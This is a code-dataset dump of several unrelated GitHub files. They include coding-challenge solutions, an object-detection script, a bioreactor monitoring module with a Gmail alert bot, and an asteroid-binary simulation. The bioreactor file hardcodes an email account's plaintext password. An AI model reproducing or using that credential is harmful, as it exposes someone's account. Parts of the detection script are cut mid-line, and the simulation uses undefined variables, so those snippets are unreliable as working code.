has been stored.\")\n stored = data\n else:\n await ctx.send(\"Do you want to `read` or `write`?\")\n\n\ndef setup(bot):\n # Every extension should have this function\n bot.add_command(bologna)\n","repo_name":"CatnamedFinn/Mentlebot","sub_path":"bot/commands/bologna.py","file_name":"bologna.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73852788203","text":"import sys\ninput = sys.stdin.readline\n\nif __name__ == \"__main__\":\n tryCount = int(input())\n counts = [0,1,2,4] # count for 0, 1,2,3\n for _ in range(tryCount):\n num = int(input())\n if num >= len(counts):\n for i in range(len(counts), num + 1):\n counts.append(counts[i - 1] + counts[i - 2] + counts[i - 3])\n print(counts[num])","repo_name":"HyunwooKoh/CodingTest","sub_path":"baekjoon/silver3/sol_9095.py","file_name":"sol_9095.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70977049004","text":"# %%\n# For running inference on the TF-Hub module.\nimport tensorflow as tf\nimport pandas as pd\nimport tensorflow_hub as hub\n\n# For downloading the image.\nimport matplotlib.pyplot as plt\nimport tempfile\nfrom six.moves.urllib.request import urlopen\nfrom six import BytesIO\nimport json\n\n# For drawing onto the image.\nimport numpy as np\nfrom PIL import Image\nfrom PIL import ImageColor\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\nfrom PIL import ImageOps\n\nimport imutils\nimport cv2\n\n# For measuring the inference time.\n#import time\n\nfrom tqdm import tqdm\ntqdm.pandas()\n\n# Print Tensorflow version\nprint(tf.__version__)\n\n# Check available GPU devices.\nprint(\"The following GPU devices are available: %s\" % tf.test.gpu_device_name())\n\nmodule_handle = \"https://tfhub.dev/google/faster_rcnn/openimages_v4/inception_resnet_v2/1\" \ndetector = hub.load(module_handle).signatures['default']\n\n# %%\n# Helper functions for downloading images and for visualization.\n# Visualization code adapted from TF object detection API for the simplest required functionality.\ndef display_image(image):\n fig = plt.figure(figsize=(20, 15))\n plt.grid(False)\n plt.imshow(image)\n\n\ndef download_and_resize_image(url, new_width=256, new_height=256,\n display=False):\n _, filename = tempfile.mkstemp(suffix=\".jpg\")\n response = urlopen(url)\n image_data = response.read()\n image_data = BytesIO(image_data)\n pil_image = Image.open(image_data)\n \n open_cv_image = np.array(pil_image)\n h,w,c = open_cv_image.shape\n if h/480 total_display_str_height:\n text_bottom = top\n else:\n text_bottom = top + total_display_str_height\n # Reverse list and print from bottom to top.\n for display_str in display_str_list[::-1]:\n bbox = font.getbbox(display_str)\n text_width, text_height = bbox[2], bbox[3]\n margin = np.ceil(0.05 * text_height)\n draw.rectangle([(left, text_bottom - text_height - 2 * margin),\n (left + text_width, text_bottom)],\n fill=color)\n draw.text((left + margin, text_bottom - text_height - margin),\n display_str,\n fill=\"black\",\n font=font)\n text_bottom -= text_height - 2 * margin\n\n\ndef draw_boxes(image, boxes, class_names, scores, max_boxes=20, min_score=0.1):\n \"\"\"Overlay labeled boxes on an image with formatted scores and label names.\"\"\"\n colors = list(ImageColor.colormap.values())\n\n font = ImageFont.load_default()\n\n for i in range(min(boxes.shape[0], max_boxes)):\n if scores[i] >= min_score:\n ymin, xmin, ymax, xmax = tuple(boxes[i])\n display_str = \"{}: {}%\".format(class_names[i].decode(\"ascii\"),\n int(100 * scores[i]))\n color = colors[hash(class_names[i]) % len(colors)]\n image_pil = Image.fromarray(np.uint8(image)).convert(\"RGB\")\n draw_bounding_box_on_image(\n image_pil,\n ymin,\n xmin,\n ymax,\n xmax,\n color,\n font,\n display_str_list=[display_str])\n np.copyto(image, np.array(image_pil))\n return image\n\n\ndef load_img(path):\n img = tf.io.read_file(path)\n img = tf.image.decode_jpeg(img, channels=3)\n return img\n \n\n# %%\ndef run_detector(detector, path):\n img = load_img(path)\n\n converted_img = tf.image.convert_image_dtype(img, tf.float32)[tf.newaxis, ...]\n #start_time = time.time()\n result = detector(converted_img)\n #end_time = time.time()\n\n result = {key:value.numpy() for key,value in result.items()}\n\n #print(\"Found %d objects.\" % len(result[\"detection_scores\"]))\n #print(\"Inference time: \", end_time-start_time)\n\n image_with_boxes = draw_boxes(\n img.numpy(), result[\"detection_boxes\"],\n result[\"detection_class_entities\"], result[\"detection_scores\"])\n\n boxes = result['detection_boxes']\n min_score=0.1\n scores = result['detection_scores']\n class_names = result['detection_class_entities']\n\n objects_detected = pd.DataFrame()\n\n for i in range(boxes.shape[0]):\n if scores[i] >= min_score:\n #ymin, xmin, ymax, xmax = tuple(boxes[i])\n objects_detected = pd.concat([objects_detected, pd.DataFrame({'object':[class_names[i].decode(\"ascii\")], 'score':[int(100 * scores[i])]})])\n \n # display_image(image_with_boxes)\n return result, objects_detected\n \n\n# %%\nimage_urls = [\n # Source: https://commons.wikimedia.org/wiki/File:The_Coleoptera_of_the_British_islands_(Plate_125)_(8592917784).jpg\n \"https://upload.wikimedia.org/wikipedia/commons/1/1b/The_Coleoptera_of_the_British_islands_%28Plate_125%29_%288592917784%29.jpg\",\n # By Américo Toledano, Source: https://commons.wikimedia.org/wiki/File:Biblioteca_Maim%C3%B3nides,_Campus_Universitario_de_Rabanales_007.jpg\n \"https://upload.wikimedia.org/wikipedia/commons/thumb/0/0d/Biblioteca_Maim%C3%B3nides%2C_Campus_Universitario_de_Rabanales_007.jpg/1024px-Biblioteca_Maim%C3%B3nides%2C_Campus_Universitario_de_Rabanales_007.jpg\",\n # Source: https://commons.wikimedia.org/wiki/File:The_smaller_British_birds_(8053836633).jpg\n \"https://upload.wikimedia.org/wikipedia/commons/0/09/The_smaller_British_birds_%288053836633%29.jpg\",\n ]\n\ndef detect_img(image_url):\n #start_time = time.time()\n image_path = download_and_resize_image(image_url, 640, 480, True)\n result, df = run_detector(detector, image_path)\n #end_time = time.time()\n #print(\"Inference time:\",end_time-start_time)\n try:\n return df['object'].unique()\n except:\n return None\n\ndef detect_img1(image_url):\n #start_time = time.time()\n image_path = download_and_resize_image1(image_url, 640, 480, False)\n result, df = run_detector(detector, image_path)\n #end_time = time.time()\n #print(\"Inference time:\",end_time-start_time)\n try:\n return df['object'].unique()\n except:\n return None\n\n# %%\n# df1 = pd.read_pickle('final_df.pkl').reset_index(drop=True)\n# df1['image_filename'] = df1['image_filename'].apply(lambda x: x.split('/')[-1])\n\n# f = open('gcp_results.json')\n# data = json.load(f)\n\n# # set objects and labels\n# df1['objects'] = None\n# df1['labels'] = None\n# for i in range(df1['image_filename'].shape[0]):\n# object_data = set([filename['name'] for filename in data[df1.iloc[i]['image_filename']]['Objects']])\n# labels_data = set(data[df1.iloc[i]['image_filename']]['Labels'])\n# df1.loc[i, 'objects'] = str(object_data)\n# df1.loc[i, 'labels'] = str(labels_data)\n\n# %%\ndf = pd.read_pickle('final_objects3.pkl')\n\n# %%\n#df1['frcnn_objects'] = None\nfor i in tqdm(range(df['image_filename'].shape[0])):\n df.loc[i, 'frcnn_objects'] = str(detect_img(df['primaryImageURL'].iloc[i]))\n #df.to_pickle('final_objects4.pkl')\n\n# %%\nimport pandas as pd\ndf = pd.read_pickle('final_objects4.pkl')\n# %%\ni=1\ni=120\ni=130\ni=270\ni=360\ni=4298\ni=6782\ni=7590\ni=8001\nurl = df['primaryImageURL'].iloc[i]\nprint('new frcnn:', detect_img(url))\nprint('old frcnn:', detect_img1(url))\nprint('Vision Objects:', df['objects'].iloc[i])\nprint('Vision Labels:', df['labels'].iloc[i], '\\n')\nprint(df['frcnn_objects'].iloc[i])\n","repo_name":"AbhinavJhanwar/object-detection-classification","sub_path":"frcnn/tensorflow_based_frcnn.py","file_name":"tensorflow_based_frcnn.py","file_ext":"py","file_size_in_byte":9374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29437216523","text":"from datetime import datetime\nfrom matplotlib import pyplot as plt\nfrom matplotlib import animation\nfrom collections import deque\nfrom mailMIME import BioreactorGmailBot\nimport random\nimport os\nimport csv\nimport threading\nimport shutil\nimport json\n\nclass TwoLiveData:\n def __init__(self, parent):\n \"\"\" Initiates the live data visualisation tool.\n This tool will create two live graphs stacked on top of each other, and will continuously update both graphs as long as there's\n a constant stream of input data.\n Additionally, it will save all incoming data to .csv file in a dedicated directory.\n It also has a backend email bot that will send an email to relevant stakeholders when readings reach/exceed\n a certain threshold.\n \"\"\"\n self.fig, self.ax = plt.subplots(2) # Draws two boxes (for graphs)\n self.tubes = [{} for _ in range(6)]\n self.parent = parent\n self.tube_statuses = self.parent.get_tube_statuses()\n self.load_settings() # Loads\n self.now = datetime.now()\n\n # Logging into Gmail...\n # Needed for the email bot to work.\n self.mail_bot = BioreactorGmailBot(parent, \"bioreactor.bot@gmail.com\", \"75q3@*NyiVDKmr_k\")\n\n # Clear everything in data.\n #for i in os.listdir(\"data\"):\n # os.remove(os.path.join(\"data\", i))\n\n def gen_data(self):\n \"\"\" Generates random data\n *Used for testing purposes\n namely for reading and recording data.\n\n Return\n ------\n A list of values (Strings) that will be stored as a row in the final .csv file.\n \"\"\"\n return [datetime.now().strftime(\"%H:%M:%S\"), random.randint(6,9), random.randint(29, 31)]\n\n def animate(self, i):\n \"\"\" Called once every frame to update graph by creating a new one, creating the illusion of live-data.\n Since this function is executed one per tick (can be set to an arbitrary period of time like a second...), many\n things are done per tick:\n 1. Reading/generating data\n 2. Check time & and delete old files if need be.\n 3. Check data thresholds and send emails to relevant stakeholders if need be.\n 4. Save data.\n 5. Plot data.\n Parameter\n ---------\n i (?): Don't know, but it's needed for FuncAnimation though.\n \"\"\"\n\n # Actual sensor input here\n # Currently, I'm using randomly generated values. Feel free to replace those when sensors work.\n ph = [random.randint(6,9) for _ in self.tubes] # Need to generate a list with the length equal\n # to the maximum number of tubes. For tube numbers that will turned off/not being monitored, just use any dummy\n # value.\n # When attaching hardware code, make sure you store your data like this. If a sensor is turned off, just use\n # a dummy value such as 0 to maintain the same list structure. That dummy value won't be read by the system.\n temperature = [random.random()*3+28 for _ in self.tubes]\n\n # Recording time\n now = datetime.now()\n time = now.strftime(\"%H:%M:%S\")\n\n directory = os.path.join(\"data\", now.strftime(\"%d-%m-%Y\"))\n\n new_day = not os.path.isdir(directory)\n # If we're in a new day, create a new directory with the date as its name.\n if new_day:\n os.mkdir(directory)\n\n for i in range(len(self.tubes)):\n if self.tube_statuses[i]:\n tube_dir = os.path.join(directory, f\"tube{i+1}.csv\")\n new_file = not os.path.isfile(tube_dir)\n with open(tube_dir, \"a+\", newline='', encoding=\"utf-8\") as seesv:\n writer = csv.writer(seesv)\n # Check and see if this new .csv file already exists\n if new_file: # If it doesn't exist, append heading\n writer.writerow([\"Time\", \"pH\", \"Temperature\"])\n # Remove the oldest file:\n # Taken from: https://stackoverflow.com/questions/47739262/find-remove-oldest-file-in-directory\n list_of_files = os.listdir('data')\n if len(list_of_files) >= int(data_life[self.settings[\"data_life\"]]):\n oldest_file = min(list_of_files, key=os.path.getctime)\n shutil.rmtree(os.path.abspath(oldest_file))\n writer.writerow([time, ph[i], temperature[i]]) # Append new data\n\n\n \"\"\"\n self.mail_bot.conditional_send_to_all(\n \"Too Hot!\",\n \"At least one of your tubes are overheating\",\n overheating_tubes,\n temperature,\n auto_heading=True,\n attach_file= [os.path.join(directory, f\"tube{i+1}.csv\") if self.tube_statuses[i] else 0 for i in range(len(self.tube_statuses))],\n )\n \"\"\"\n \"\"\" Sending an email with threading\n # Delay times are inconsistent, but are quite short. \n # Also requires a multi-core machine to run.\n \n mail_thread = threading.Thread(target=self.mail_bot.conditional_send,\n args = (\"liset73655@zefara.com\",\n \"Too hot!!!\",\n \"Wow! It's {}°C in Melbourne!\",\n lambda x: x[0] > 30,\n genY),\n kwargs={\"auto_parse\":True,\n \"attach_file\": os.path.join(\"data\", self.today+\".csv\")},\n daemon=True)\n \n mail_thread.start()\n \n \"\"\"\n \"\"\" Sending an email without threading.\n # Delay times are consistent, but are quite long.\n\n self.mail_bot.conditional_send(\"liset73655@zefara.com\",\n \"Too hot!!!\",\n \"Wow! It's {}°C in Melbourne!\",\n lambda x: x[0] > 30,\n genY,\n auto_parse=True,\n attach_file=os.path.join(\"data\", self.today+\".csv\"))\n \"\"\"\n\n # In practice:\n mail_thread_temperature = threading.Thread(target=self.mail_bot.conditional_send_to_all,\n args = (\"Tube threshold exceeded!!!\",\n \"At least one of your tubes are overheating or have bad pH levels. Please check the attached \"\n \".csv file(s).\",\n ph_temp,\n ph,\n temperature\n ),\n kwargs={\"auto_heading\":True,\n \"auto_parse\":False,\n \"attach_file\": [os.path.join(directory, f\"tube{i+1}.csv\") if self.tube_statuses[i] else 0 for i in range(len(self.tube_statuses))]\n },\n #daemon=True\n )\n\n mail_thread_temperature.start()\n\n\n\n # Clear previously graphed data:\n for axe in self.ax:\n axe.clear()\n axe.grid(axis='y')\n\n plt.rc('grid', linestyle=':', linewidth=1)\n\n # Adding newly produced/read data to prepare for data visualisation.\n self.times.append(time)\n for i in range(len(self.tubes)):\n if self.tube_statuses[i]:\n tube = self.tubes[i]\n if not tube:\n self.update_tube(tube)\n tube[\"ph\"].append(ph[i])\n tube[\"temperature\"].append(temperature[i])\n self.ax[0].plot(self.times, tube[\"ph\"], c=colours[i-1] ,label=f\"Tube {i+1}\")\n self.ax[1].plot(self.times, tube[\"temperature\"], c=colours[i-1], label=f\"Tube {i+1}\")\n self.ax[0].legend(title=\"pH\", loc=\"upper left\")\n self.ax[1].legend(title=\"Temperature\", loc=\"upper left\")\n\n\n self.ax[0].set(ylabel=\"pH\")\n self.ax[1].set(xlabel=\"Time\", ylabel=\"°C\")\n\n\n plt.setp(self.ax[0].get_xticklabels(), visible=False)\n\n\n def animator(self, interval=1000):\n \"\"\" Called to animate the live graph. It just has to exist somewhere in run-time as a variable.\n\n Parameter\n ---------\n interval (Int, optional): Determines the frame update rate (milliseconds).\n\n Return\n ------\n FuncAnimation\n \"\"\"\n\n return animation.FuncAnimation(self.fig, self.animate, interval=self.translate_interval(self.settings[\"read_interval\"]))\n #self.animater = animation.FuncAnimation(self.fig, self.animate, interval=read_interval[self.settings[\"read_interval\"]])\n\n def load_settings(self):\n \"\"\" Loads settings data from data_settings.json\n Also creates an (settings) image of each tube.\n \"\"\"\n #print(\"Load Settings called\")\n settings_path = os.path.join(\"assets\", \"settings\",\"data_settings.json\")\n #if os.path.isfile(settings_path): # Checks and sees if there's a pre-existing settings file.\n with open(settings_path) as f: # If so, load its content as its settings\n self.settings = json.load(f)\n # These are temporary randomly generated data points. They will be replaced by actual data points soon.\n self.times = deque([], int(self.settings[\"data_points\"]))\n\n for i, tube in enumerate(self.tubes):\n if self.tube_statuses[i]:\n self.prepare_new_tube(tube)\n\n\n def update_data_settings(self, settings):\n \"\"\" Sets the current data setting to the input setting\n Also updates tube settings to reflect on this change.\n :param settings: a dictionary with the settings that we want.\n \"\"\"\n self.settings = settings\n self.tube_statuses = self.parent.get_tube_statuses()\n self.times = deque(self.times, int(self.settings[\"data_points\"]))\n for i, tube in enumerate(self.tubes):\n if not self.tube_statuses[i]:\n tube.clear()\n else:\n self.update_tube(tube)\n\n def update_settings(self, settings):\n \"\"\" Sets the current data setting to the input setting\n :param settings: a dictionary with the settings that we want.\n \"\"\"\n self.settings = settings\n\n def translate_interval(self, key):\n \"\"\" Translates settings value from string to int.\n In the bioreactor data settings page, there are drop down boxes with options such as '1sec', '1day', etc. They\n need to be translated to integers to reflect on these times.\n :param key: a string that'll be used to get the integer value that will reflect on it.\n :return: an integer that reflects on the value that the key is referring to.\n \"\"\"\n return read_interval[key]\n\n def prepare_new_tube(self, tube):\n \"\"\" Initialises a tube deque\n Used for plotting data for a specific tube. The length is determined by the pre-loaded settings.\n :param tube: a dictionary that represents the settings used by a particular tube.\n \"\"\"\n tube[\"ph\"] = deque([], int(self.settings[\"data_points\"]))\n tube[\"temperature\"] = deque([], int(self.settings[\"data_points\"]))\n # To add more parameters, just follow the following template:\n # tube[PARAMETER] = deque([], int(self.settings[PARAMETER]))\n # PARAMETER needs to be a valid setting in ...\n\n def update_tube(self, tube):\n \"\"\" Updates a specific tube.\n If the tube exists, update it with updated settings, otherwise, create a new tube.\n :param tube: a dictionary that represents the settings used by a particular tube.\n :return:\n \"\"\"\n if tube:\n tube[\"ph\"] = deque(tube[\"ph\"], int(self.settings[\"data_points\"]))\n tube[\"temperature\"] = deque(tube[\"temperature\"], int(self.settings[\"data_points\"]))\n else:\n tube[\"ph\"] = deque([0 for _ in self.times], int(self.settings[\"data_points\"]))\n tube[\"temperature\"] = deque([0 for _ in self.times], int(self.settings[\"data_points\"]))\n\n def update_tube_status(self, tube_no, status):\n \"\"\" Updates the status of a particular tube.\n The status refers to whether or not the tube is online or offline.\n :param tube_no: the tube number of a particular tube.\n :param status: a boolean.\n \"\"\"\n self.tube_statuses[tube_no-1] = status\n\n def tube_clear(self, tube_no):\n \"\"\" Clears all data recorded on a specific tube.\n :param tube_no: an integer allocated to each tube. Ranges from 1-6.\n \"\"\"\n self.tubes[tube_no-1] = {\"ph\":deque([],int(self.settings[\"data_points\"])),\n \"temperature\":deque([],int(self.settings[\"data_points\"]))}\n\ndef overheating_tubes(temperatures, threshold=30):\n \"\"\" Checks to see if input temperatures exceed the threshold.\n :param temperatures: a list of numbers representing temperature.\n :param threshold: the threshold number.\n :return: a list of boolean that determines whichever tube is overheating or not.\n \"\"\"\n #print(temperatures)\n return [temp > threshold for temp in temperatures]\n\ndef bad_ph_tubes(phs, lower_threshold=7, upper_threshold=8):\n \"\"\" Same as overheating_tubes, but for pH.\n :param phs: a list of numbers representing pH.\n :param lower_threshold: the lower threshold number.\n :param upper_threshold: the upper threshold number.\n :return: a list of boolean that determines whichever tube is has a pH outside of its ideal range.\n \"\"\"\n return [lower_threshold <= ph <= upper_threshold for ph in phs]\n\ndef ph_temp(ph, temp):\n \"\"\" Checks both temperature and pH\n Outputs True for a particular if the tube has bad pH, overheated, or both\n :param ph: a list of numbers representing pH.\n :param temp: a list of numbers representing temperature.\n :return: a list of boolean that determines whichever tube is overheating, has a bad pH level, or both.\n \"\"\"\n t = overheating_tubes(temp)\n p = bad_ph_tubes(ph)\n return [t[i] or p[i] for i in range(len(t))]\n# Converts data life keys to actual integer values.\nwith open(os.path.join(\"assets\", \"settings\", \"data_life.json\")) as f:\n data_life = json.load(f)\n# Converts read interval keys to actual integer values.\nwith open(os.path.join(\"assets\", \"settings\", \"read_interval.json\")) as f:\n read_interval = json.load(f)\n\n# More colours at: https://matplotlib.org/stable/gallery/color/named_colors.html\ncolours = [\"cyan\", \"lime\", \"fuchsia\", \"gold\", \"navy\", \"teal\"]\n\nif __name__ == \"__main__\":\n producer = TwoLiveData()\n ani = producer.animator()\n plt.show()\n\n","repo_name":"Fresh-Broccoli/bms","sub_path":"two.py","file_name":"two.py","file_ext":"py","file_size_in_byte":15109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10413071154","text":"# %%\nimport rebound\nimport numpy as np\nimport pandas as pd\nfrom scipy.optimize import fsolve\nfrom timeit import default_timer as timed\n\n\ng = 6.67428e-11 # gravitational constanct in SI units\nau = 1.496e11 # astronomical unit \nmsun = 1.9891e30 # mass of sun\ns1, s2 = 100e3, 100e3 # radius of primary and of secondary\ndens = 700. # density of primary, secondary, and impactor \nm1 = 4./3.*np.pi*dens*s1**3 # mass of primary calculated from density and radius\nm2 = 4./3.*np.pi*dens*s2**3 # mass of secondary calculated from density and radius\nrsun = 44.*au # distance of centre of mass of binary from the sun \nrhill = rsun*(m1/msun/3.)**(1./3.) # Hill radius of primary\n\na = 0.2*rhill # separation of binary\ne = 0\n\nt = 2.*np.pi/np.sqrt(g*msun/rsun**3) # orbital period of binary around the sun\ntotaltime = t*2\nnoutputs = 1000 # number of outputs for plotting\ntimes = np.linspace(0,totaltime, noutputs) # create times for integrations\np, s, imp = np.zeros((noutputs, 3)), np.zeros((noutputs, 3)), np.zeros((noutputs, 3))\nvp, vs, vimp = np.zeros((noutputs, 3)), np.zeros((noutputs, 3)), np.zeros((noutputs, 3))\n\n# header for pandas dataframe\nheaders = ['time','b',\n 'hash prim','mass prim','radius prim','x prim','y prim','z prim','vx prim','vy prim','vz prim',\n 'hash sec','mass sec','radius sec','x sec','y sec','z sec','vx sec','vy sec','vz sec',\n 'hash imp','mass imp','radius imp','x imp','y imp','z imp','vx imp','vy imp','vz imp',]\n\ncoll_headers = ['time','body','r','m','x','y','z','vx','vy','vz']\n\nsim_name = \"chaos_thesis_test\"\n\n# simp = np.arange(50e3,210e3,50e3) # create range of impactor sizes to loop through\n# b = np.arange(2,6.1,1) # create range of impact parameters to loop through\n\nsimp = np.ones(5)*100e3\nb = np.ones(1)*3\n\n\ntimer = timed() # start timer to time simulations\n\nfor j in range(len(b)): # loop through each impact parameter\n for i in range(len(simp)): # loop throught each impactor radius\n print('step ' + str(j + 1) + '-' + str(i+1))\n bhill = b[j]*rhill # impact parameter\n mimp = 4./3.*np.pi*dens*simp[i]**3 # mass of impactor\n theta = 0.0015 # true anomaly of impactor\n inc_imp = np.random.rayleigh(2)\n e_imp = np.random.rayleigh(0.05)\n \n e = np.random.uniform()*0.5\n inc = np.random.uniform()*2*np.pi\n omega = np.random.uniform()*2*np.pi\n Omega = np.random.uniform()*2*np.pi\n # inc = 0\n # omega = 0\n # Omega = 0\n # f = np.random.uniform()*2*np.pi\n \n # n_bin = np.sqrt(g*msun/rsun)**3 # mean motion of binary COM\n # n_imp = np.sqrt(g*msun/(rsun+bhill))**3 # mean motion of impactor\n \n \n # f_enc = np.arccos((rsun+b)*(1-e_imp**2)/(e_imp*(rsun+b)) - 1/e_imp) # angle at which close encounter occurs\n f_enc = np.arccos(-e_imp) # always needs to be in second quadrant\n # E = np.arctan( np.sqrt(1-e_imp**2) * np.sin(f_enc) / (e_imp + np.cos(f_enc)) ) # E at encounter \n E = np.arctan2( np.sqrt(1-e_imp**2) * np.sin(f_enc), e_imp + np.cos(f_enc))\n M = E - e_imp*np.sin(E) # mean anomaly at encounter\n t_enc = np.pi/n_bin # time it takes for binary COM to get to crossover point\n M_0 = n_imp*-t_enc + M # mean anomaly at start of sim\n \n def func(x):\n return x-e_imp*np.sin(x) - M_0\n \n E_0 = fsolve(func, 1)\n \n # f_0 = np.arccos( (np.cos(E_0) - e_imp) / (1 - e_imp*np.cos(E_0)) )\n \n f_0 = 2 * np.arctan2( np.sqrt(1+e_imp)*np.sin(E_0/2) , np.sqrt(1-e_imp)*np.cos(E_0/2) )\n \n def setupSimulation():\n sim = rebound.Simulation() # initialize rebound simulation\n sim.G = g # set G which sets units of integrator - SI in this case\n sim.collision = 'direct'\n sim.add(m=m1, r=s1, hash=\"primary\")\n sim.add(m=m2, r=s2, a=a, e=e, inc=inc, omega=omega, Omega=Omega, f=f, hash=\"secondary\")\n sim.add(m=msun, a=rsun, f=np.pi, hash=\"sun\")\n sim.move_to_com()\n sim.add(m=mimp, r=simp[i], a=rsun+bhill, f=theta, hash=\"impactor\")\n # sim.add(m=mimp, r=simp[i], a=rsun+bhill, e=e_imp, omega=np.pi-f_enc, f=f_0, inc=inc_imp, Omega=0, hash=\"impactor\")\n return sim\n \n sim = setupSimulation()\n ps = sim.particles # create variable containing particles in simulation\n all_ps = [p.hash.value for j, p in enumerate(ps)]\n \n ps1 = ps[\"primary\"].index\n ps2 = ps[\"secondary\"].index\n ps3 = ps[\"impactor\"].index\n \n try:\n for k, time in enumerate(times):\n sim.integrate(time)\n # print(k)\n p[k] = [ps[\"primary\"].x, ps[\"primary\"].y, ps[\"primary\"].z]\n s[k] = [ps[\"secondary\"].x, ps[\"secondary\"].y, ps[\"secondary\"].z]\n imp[k] = [ps[\"impactor\"].x, ps[\"impactor\"].y, ps[\"impactor\"].z]\n vp[k] = [ps[\"primary\"].vx, ps[\"primary\"].vy, ps[\"primary\"].vz]\n vs[k] = [ps[\"secondary\"].vx, ps[\"secondary\"].vy, ps[\"secondary\"].vz]\n vimp[k] = [ps[\"impactor\"].vx, ps[\"impactor\"].vy, ps[\"impactor\"].vz]\n except rebound.Collision:\n print('collision detected')\n collided = []\n for item in sim.particles:\n if item.lastcollision == sim.t:\n collided.append([sim.t, item.index, item.r, item.m, item.x, item.y, item.z, item.vx, item.vy, item.vz])\n collided = np.array(collided) \n df_coll = pd.DataFrame(collided)\n df_coll.to_csv(f'./thesis_results/collision_{sim_name}_{np.round(simp[i]/1e3, 1)}_{np.round(b[j], 1)}.csv', header=coll_headers)\n #df_coll.to_csv(f'./thesis_results/collision_{sim_name}_{i}.csv', header=coll_headers)\n \n sim.collision_resolve = 'merge'\n \n for k, time in enumerate(times):\n sim.integrate(time)\n existing_ps = [p.hash.value for j, p in enumerate(ps)]\n if all_ps[0] in existing_ps:\n p[k] = [ps[\"primary\"].x, ps[\"primary\"].y, ps[\"primary\"].z]\n vp[k] = [ps[\"primary\"].vx, ps[\"primary\"].vy, ps[\"primary\"].vz]\n if all_ps[1] in existing_ps:\n s[k] = [ps[\"secondary\"].x, ps[\"secondary\"].y, ps[\"secondary\"].z]\n vs[k] = [ps[\"secondary\"].vx, ps[\"secondary\"].vy, ps[\"secondary\"].vz]\n if all_ps[3] in existing_ps:\n imp[k] = [ps[\"impactor\"].x, ps[\"impactor\"].y, ps[\"impactor\"].z]\n vimp[k] = [ps[\"impactor\"].vx, ps[\"impactor\"].vy, ps[\"impactor\"].vz]\n \n \n # create matrix of results in same order as header created above - reshape some to avoid error\n particles = np.hstack((np.reshape(times,(noutputs,1)),\n np.reshape(np.ones(noutputs)*b[j]/rhill,(noutputs,1)),\n np.reshape(np.ones(noutputs)*ps1, (noutputs,1)),\n np.reshape(np.ones(noutputs)*m1, (noutputs,1)),\n np.reshape(np.ones(noutputs)*s1, (noutputs,1)),\n p,\n vp,\n np.reshape(np.ones(noutputs)*ps2, (noutputs,1)),\n np.reshape(np.ones(noutputs)*m2, (noutputs,1)),\n np.reshape(np.ones(noutputs)*s2, (noutputs,1)),\n s,\n vs,\n np.reshape(np.ones(noutputs)*ps3, (noutputs,1)),\n np.reshape(np.ones(noutputs)*mimp,(noutputs,1)),\n np.reshape(np.ones(noutputs)*simp[i],(noutputs,1)),\n imp,\n vimp))\n \n df = pd.DataFrame(particles)\n \n df.to_csv(f'./thesis_results/{sim_name}_{np.round(simp[i]/1e3, 1)}_{np.round(b[j], 1)}.csv', header=headers)\n #df.to_csv(f'./thesis_results/{sim_name}_{i}.csv', header=headers)\n \nprint(timed()-timer) # finish timer","repo_name":"Johngn/binaries","sub_path":"main_sim.py","file_name":"main_sim.py","file_ext":"py","file_size_in_byte":8592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74137825003","text":"def find_parent(child, c_parent):\n if parent[child]:\n c_parent.append(parent[child])\n find_parent(parent[child], c_parent)\n\n\ndef find_cp(c1_p, c2_p):\n for p1 in c1_p:\n for p2 in c2_p:\n if p1 == p2:\n return p1\n\n\ndef subtree(start):\n global sub_cnt\n if left[start]:\n sub_cnt += 1\n subtree(left[start])\n if right[start]:\n sub_cnt += 1\n subtree(right[start])\n\n\nT = int(input())\nfor tc in range(1, T+1):\n V, E, c1, c2 = map(int, input().split())\n left = [0]*(V+1)\n right = [0]*(V+1)\n parent = [0]*(V+1)\n edge = list(map(int, input().split()))\n for i in range(0, E*2-1, 2):\n p, c = edge[i], edge[i+1]\n if not left[p]:\n left[p] = c\n else:\n right[p] = c\n parent[c] = p\n c1_parent = []\n c2_parent = []\n find_parent(c1, c1_parent)\n find_parent(c2, c2_parent)\n cp = find_cp(c1_parent, c2_parent)\n sub_cnt = 0\n subtree(cp)\n print('#{} {} {}'.format(tc, cp, sub_cnt+1))","repo_name":"JIH319/cereal","sub_path":"inha/week04/1248_공통조상.py","file_name":"1248_공통조상.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"3447918541","text":"class Solution:\n def minOperations(self, nums: List[int], queries: List[int]) -> List[int]:\n nums.sort()\n n=len(nums)\n prefix=[0]*(n+1)\n ans=[]\n for i in range(n):\n prefix[i+1]=prefix[i]+nums[i]\n for q in queries:\n ind=bisect_left(nums,q)\n add=q*ind-(n-ind)*q\n to=prefix[-1]-2*prefix[ind]\n ans.append(add+to)\n\n return ans\n ","repo_name":"kibrnew/computative-kb","sub_path":"2602-minimum-operations-to-make-all-array-elements-equal/2602-minimum-operations-to-make-all-array-elements-equal.py","file_name":"2602-minimum-operations-to-make-all-array-elements-equal.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21394616860","text":"num = int(input())\r\nnumbers = map(int, input().split())\r\ncount = 0\r\n\r\nfor n in numbers:\r\n error = 0\r\n if n > 1:\r\n for i in range(2, n):\r\n if n % i == 0:\r\n error += 1\r\n if error == 0:\r\n count += 1\r\n\r\nprint(count)\r\n","repo_name":"hyeonjin6530/Baekjoon","sub_path":"백준/Silver/1978. 소수 찾기/소수 찾기.py","file_name":"소수 찾기.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"72316495404","text":"\"\"\"\nGiven two words (beginWord and endWord), and a dictionary's word list, find the length of shortest transformation sequence from beginWord to endWord, such that:\n\nOnly one letter can be changed at a time.\nEach transformed word must exist in the word list.\nNote:\n\nReturn 0 if there is no such transformation sequence.\nAll words have the same length.\nAll words contain only lowercase alphabetic characters.\nYou may assume no duplicates in the word list.\nYou may assume beginWord and endWord are non-empty and are not the 